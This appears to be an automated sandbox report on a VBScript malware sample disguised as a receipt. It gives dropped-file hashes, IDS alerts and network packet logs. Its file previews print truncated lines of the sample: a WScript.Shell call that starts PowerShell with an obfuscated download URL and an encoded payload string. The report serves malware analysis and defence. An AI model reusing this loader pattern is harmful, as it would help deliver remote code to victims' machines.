Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	57895
Entropy (8bit):	5.07724879463521
Encrypted:	false
SSDEEP:	1536:vvI+z30kaAxV3CNBQkj25h4iUxvaV7flJnVv6H15qdpnUSlQOdBQNUzktAHkbNK3:nI+z30NAxV3CNBQkj25qiUvaV7flJnV/
MD5:	ABF0CA1055207E755309961A7F660E0D
SHA1:	F886C56CCD77C17EBE81C8BFBFFCC42CBC614458
SHA-256:	F2161823E2B5F73BBD5C674EA1E610A412370E87E23377B9DB1E6451F5417139
SHA-512:	3535DB5640324B1E39616B23F30BE723F16446E5747A5FEC69F8090C0EDEE489E129BA9C6CC1EB5E290620570DFABC73F1CF116042B006BD692F7671A078D4CC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.X..........I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-SmbBandwidthLimit........Get-SmbClientConfiguration........Get-SmbSession........Get-Sm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1204
Entropy (8bit):	5.327588920450071
Encrypted:	false
SSDEEP:	24:3ULPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJP+qn:oPerB4nqRL/HvFe9t4Cv94aP+qn
MD5:	B2E8F5B1D2CA14F416C34A1D80229547
SHA1:	25427AFC9715DC9C34187C211788E2409C83FA48
SHA-256:	A0B23D2B06F072A75AE6E5182F3776207E9EB012C568F11A10E5EE55F1F7FD03
SHA-512:	D3E88A11415A981DD475ABB03BD2B1DAAA264FED387D1D6157317986CEC9FB813285EBCE2DEE4079A01EB929498B1D587482E8C05EF467D0796662369AC68AC0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1atir42p.ld5.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m0huyh0.ma4.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	2320
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhDjhDjhL
MD5:	2CC2E05CB39A76B255530F61BA4AA2E3
SHA1:	76BD6001B1922B2B3FB2F618740FA74A6C532A7F
SHA-256:	FBF89196FF1A9FC33EE6C42DC0A959DAA89E2322F3417C77534C9968C0885271
SHA-512:	2EACD3A81456781803A9C14F7471DBBDB126BBE7AEC3105B1A49AB115A8BB831EA0D1DF48BAB00EB8231B114EAE5A03DF73A7A60B45BA03CB2F92382CF4DBB38
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:5fM8n:5fPn
MD5:	3FA21CB1B2B651F7A7EFF30E0D346794
SHA1:	775ACA7F02D3B70DF9A3C43EF2604A82DDF5835B
SHA-256:	FB8509119CFF21F635C8D4B13F13E86FFBC4D86CD1405E6E72009B887BA05DF9
SHA-512:	6D07627042E4794E45532984F9757A8731855049C119BE83D6474BF9B887F324267A538629AACDBC0A6B6DF075C19FAFFC48EF7B85EF4385512706509A99E008
Malicious:	true
Preview:	.Y.:.w.H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	327768
Entropy (8bit):	7.999367066417797
Encrypted:	true
SSDEEP:	6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
MD5:	2E52F446105FBF828E63CF808B721F9C
SHA1:	5330E54F238F46DC04C1AC62B051DB4FCD7416FB
SHA-256:	2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
SHA-512:	C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
Malicious:	false
Preview:	pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...\|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.).....{B.[...y%...i.Q.<..xt.X..H.. ..HF7g...I.3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.\|i4...i...;O...n.?.,. ....v?.5}.OY@.dG\|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...\|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`\|.B....3.....I..o...u1..8i=.z.W..7

C:\Users\user\Documents\20210914\PowerShell_transcript.124406.LHyxpEgP.20210914170205.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12055
Entropy (8bit):	4.4346693847773615
Encrypted:	false
SSDEEP:	192:G4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWi8yyyyyyyyyyyAnmyyyyyyyyyyyimO:TX+amXQX+amXuX+amXovyGLGLwH
MD5:	BA53CE3411F704439B038CBB792ACE26
SHA1:	806FA5CC9A361B84540EEDD5D56D5C8E1264192E
SHA-256:	F5F809E2DA80FAB0E987DECBB8326CC9FD799346A1EFDE8929EEFEE5E221A0F3
SHA-512:	9FEFBB06C19244FE49712934F9F1E6EC7D778C3284CF2A04206051E4038A60B7843BB7E36E5DA5F83ED68E1F21AC54EA3608752ED2985701A3F6A227626DABAB
Malicious:	false
Preview:	.*********************..Windows PowerShell transcript start..Start time: 20210914170205..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	3.659411634570213
TrID:
File name:	15 Items Receipt.vbs
File size:	3097
MD5:	590e4e9a8494edba266bcb811dbe41aa
SHA1:	3ef7bb7024c63c97ba01d91e4a63b6ce29b0e0dc
SHA256:	74c35f5c712379fe4199b775e0f75f028dca15d5fed179b2346389160f772903
SHA512:	c806b5e3c469f1eda32a42e68c6d124c864f6fb1be777e66223ce5fe68bf3473b7767db32c57ecb26dc80d02be103561ecdc5d577c86dc6598fe0321a1aa3778
SSDEEP:	96:84yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWipjOyyyyyyyyyyy0lnmyyyyyyyyyyK:84yyyyyyyyyyyyyyRyyyyyyyyyyyyyyM
File Content Preview:	Set H = CreateObject("WScript.She"&"ll")..H1 = "POwerSheLL "..H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/14/21-17:03:23.718456	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	63183	8.8.8.8	192.168.2.5
09/14/21-17:03:30.975951	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60151	8.8.8.8	192.168.2.5
09/14/21-17:03:51.728991	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60075	8.8.8.8	192.168.2.5
09/14/21-17:03:58.764155	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	55016	8.8.8.8	192.168.2.5
09/14/21-17:04:19.161900	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	54791	8.8.8.8	192.168.2.5
09/14/21-17:04:48.967883	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56432	8.8.8.8	192.168.2.5
09/14/21-17:04:56.045281	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	52929	8.8.8.8	192.168.2.5
09/14/21-17:05:18.311486	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56895	8.8.8.8	192.168.2.5
09/14/21-17:05:25.436649	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	62372	8.8.8.8	192.168.2.5
09/14/21-17:05:32.478907	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	61515	8.8.8.8	192.168.2.5
09/14/21-17:05:46.116607	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	57172	8.8.8.8	192.168.2.5
09/14/21-17:06:00.274141	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50969	8.8.8.8	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 17:02:15.661542892 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:15.661598921 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:15.661772013 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:15.739501953 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:15.739531994 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:15.854113102 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:15.854325056 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:15.861264944 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:15.861299038 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:15.861641884 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:15.894768953 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:15.935195923 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:16.562267065 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:16.562314987 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:16.562520027 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:16.562532902 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:16.562614918 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:16.584326029 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:16.584448099 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:16.585403919 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:16.585491896 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:16.585501909 CEST	443	49734	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:16.595592976 CEST	49734	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:49.723086119 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:49.723153114 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:49.723284006 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:49.723582983 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:49.723599911 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:49.841942072 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:49.846954107 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:49.846999884 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:50.993673086 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:50.993719101 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:50.993829966 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:50.993843079 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:50.993892908 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.046374083 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.046525002 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.097986937 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.098110914 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.098126888 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.098196983 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.214155912 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.214211941 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.214334011 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.267709970 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.267930031 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.323153973 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.323275089 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.433917046 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.434339046 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.497731924 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.497927904 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.612530947 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.612694025 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.673249006 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.673394918 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.729811907 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.730062008 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.829627037 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.829737902 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.886809111 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.886991978 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:51.940871954 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:51.941051006 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.037070990 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.037276983 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.082986116 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.083322048 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.169347048 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.169455051 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.213782072 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.213987112 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.256961107 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.257154942 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.343024969 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.343127012 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.385526896 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.385741949 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.491178036 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.491427898 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.511723042 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.511949062 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.553529024 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.553725004 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.631110907 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.631354094 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.667273998 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.667514086 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.702586889 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.702761889 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.771325111 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.771590948 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.803996086 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.804246902 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.868288994 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.868469954 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.901846886 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.902142048 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.933201075 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.933428049 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:52.997402906 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:52.997536898 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.029175997 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.029365063 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.091680050 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.091912031 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.119798899 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.120052099 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.147314072 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.147522926 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.216079950 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.216331959 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.245498896 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.245750904 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.276745081 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.276921988 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.334904909 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.335045099 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.365042925 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.365150928 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.424045086 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.425091028 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.452358961 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.452461004 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.481481075 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.481591940 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.538321018 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.538474083 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.567365885 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.567486048 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.625762939 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.625931025 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.654213905 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.654443026 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.684182882 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.685517073 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.714637041 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.714812040 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.771569967 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.773184061 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.802433014 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.803375006 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.876760960 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.886276007 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.888523102 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.890541077 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.923566103 CEST	443	49755	144.76.136.153	192.168.2.5
Sep 14, 2021 17:02:53.932298899 CEST	49755	443	192.168.2.5	144.76.136.153
Sep 14, 2021 17:02:53.980030060 CEST	443	49755	144.76.136.153	192.168.2.5
